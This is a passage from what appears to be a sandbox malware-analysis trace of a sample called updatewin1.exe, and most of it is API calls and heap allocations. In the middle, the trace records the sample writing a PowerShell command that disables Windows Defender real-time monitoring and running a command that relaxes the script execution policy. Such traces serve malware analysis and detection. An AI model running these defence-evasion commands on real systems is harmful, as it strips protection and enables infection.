cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0131.094] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā") returned 256 [0131.094] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0131.094] GetLastError () returned 0x57 [0131.094] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0131.094] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0131.095] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā", cchSrc=256, lpDestStr=0x18e938, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0131.095] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18f30c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x95æ\x90\x83Hõ\x18", lpUsedDefaultChar=0x0) returned 256 [0131.095] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0131.095] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0131.095] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0131.095] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e958, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0131.095] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18f20c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x95æ\x90\x83Hõ\x18", lpUsedDefaultChar=0x0) returned 256 [0131.095] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x80) returned 0x5fa0d8 [0131.095] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x416cb8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe")) returned 0x5f [0131.095] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xdc) returned 0x5fc168 [0131.095] RtlInitializeSListHead (in: ListHead=0x416bd8 | out: ListHead=0x416bd8) [0131.095] GetLastError () returned 0x0 [0131.095] GetEnvironmentStringsW () returned 0x5fc250* [0131.095] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xaca) returned 0x5fcd28 [0131.095] FreeEnvironmentStringsW (penv=0x5fc250) returned 1 [0131.095] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x98) returned 0x5fc250 [0131.095] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x3e) returned 0x5fc2f0 [0131.095] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x6c) returned 0x5fc338 [0131.096] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x6e) returned 0x5fc3b0 [0131.096] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x78) returned 0x5e1188 [0131.096] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x62) returned 0x5fc428 [0131.096] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x2e) returned 0x5e52d8 [0131.096] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x48) returned 0x5fc498 [0131.096] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x28) returned 0x5fa160 [0131.096] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1a) returned 0x5fbd18 [0131.096] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4a) returned 0x5fc4e8 [0131.096] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x72) returned 0x5e1208 [0131.096] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x30) returned 0x5e5310 [0131.096] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x2e) returned 0x5e5348 [0131.096] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1c) returned 0x5fbd40 [0131.096] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xd2) returned 0x5fc540 [0131.096] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x7c) returned 0x5fc620 [0131.096] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x36) returned 0x5fc6a8 [0131.096] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x3a) returned 0x5fc6e8 [0131.096] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x90) returned 0x5fc730 [0131.096] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x24) returned 0x5fc7c8 [0131.096] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x30) returned 0x5e5380 [0131.096] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x36) returned 0x5fc7f8 [0131.096] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x48) returned 0x5fc838 [0131.096] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x52) returned 0x5fc888 [0131.096] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x3c) returned 0x5fd818 [0131.096] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x82) returned 0x5fc8e8 [0131.096] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x2e) returned 0x5e53b8 [0131.096] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1e) returned 0x5fbd68 [0131.096] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x2c) returned 0x5e53f0 [0131.097] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x54) returned 0x5fc978 [0131.097] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x52) returned 0x5fc9d8 [0131.097] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x2a) returned 0x5e5428 [0131.097] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x3c) returned 0x5fd860 [0131.097] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x54) returned 0x5fca38 [0131.097] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x24) returned 0x5fca98 [0131.097] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x30) returned 0x5e5460 [0131.097] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x8c) returned 0x5fcac8 [0131.097] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5fcd28 | out: hHeap=0x5d0000) returned 1 [0131.097] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x800) returned 0x5fcb60 [0131.097] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0131.097] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x402ae4) returned 0x404e59 [0131.097] GetStartupInfoW (in: lpStartupInfo=0x18f578 | out: lpStartupInfo=0x18f578*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0131.097] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe\" --Admin" [0131.097] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe\" --Admin", pNumArgs=0x18e580 | out: pNumArgs=0x18e580) returned 0x5fd368*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe" [0131.097] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x18d8ec | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0131.106] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="script.ps1" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\script.ps1") returned 1 [0131.106] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\script.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\script.ps1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa8 [0131.107] lstrcpyA (in: lpString1=0x18e0ec, lpString2="Set-MpPreference -DisableRealtimeMonitoring $true" | out: lpString1="Set-MpPreference -DisableRealtimeMonitoring $true") returned="Set-MpPreference -DisableRealtimeMonitoring $true" [0131.107] lstrlenA (lpString="Set-MpPreference -DisableRealtimeMonitoring $true") returned 49 [0131.107] WriteFile (in: hFile=0xa8, lpBuffer=0x18e0ec*, nNumberOfBytesToWrite=0x31, lpNumberOfBytesWritten=0x18d8e8, lpOverlapped=0x0 | out: lpBuffer=0x18e0ec*, lpNumberOfBytesWritten=0x18d8e8*=0x31, lpOverlapped=0x0) returned 1 [0131.109] CloseHandle (hObject=0xa8) returned 1 [0131.121] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x70) returned 0x5fecd8 [0131.122] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x90) returned 0x5fed50 [0131.122] SetLastError (dwErrCode=0x0) [0131.122] lstrcpyW (in: lpString1=0x18d4e0, lpString2="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned" | out: lpString1="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned") returned="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned" [0131.122] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18d498*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18d488 | out: lpCommandLine="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned", lpProcessInformation=0x18d488*(hProcess=0xa4, hThread=0xa8, dwProcessId=0x9b4, dwThreadId=0x6d8)) returned 1 [0131.587] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0131.618] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0131.638] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0131.662] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0131.670] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0131.686] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0131.718] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0131.779] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0131.826] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0131.858] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0131.927] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.403] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.510] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.865] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.954] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.481] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) Process: id = "12" image_name = "powershell.exe" filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x537bf000" os_pid = "0x9b4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0x748" cmd_line = "powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 121 os_tid = 0x6d8 Thread: id = 122 os_tid = 0x500 Thread: id = 123 os_tid = 0x6a8 Process: id = "13" image_name = "5.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\68fff198-b032-4cc5-9a68-f439953f0783\\5.exe" page_root = "0x54c91000" os_pid = "0x30c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xa80" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\5.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 124 os_tid = 0x9f8 Thread: id = 125 os_tid = 0x330 Process: id = "14" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x56bf2000" os_pid = "0x340" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x370" cmd_line = "taskeng.exe {7DB627FC-AF07-4FFF-9157-787777EC19E2} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:LUA[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 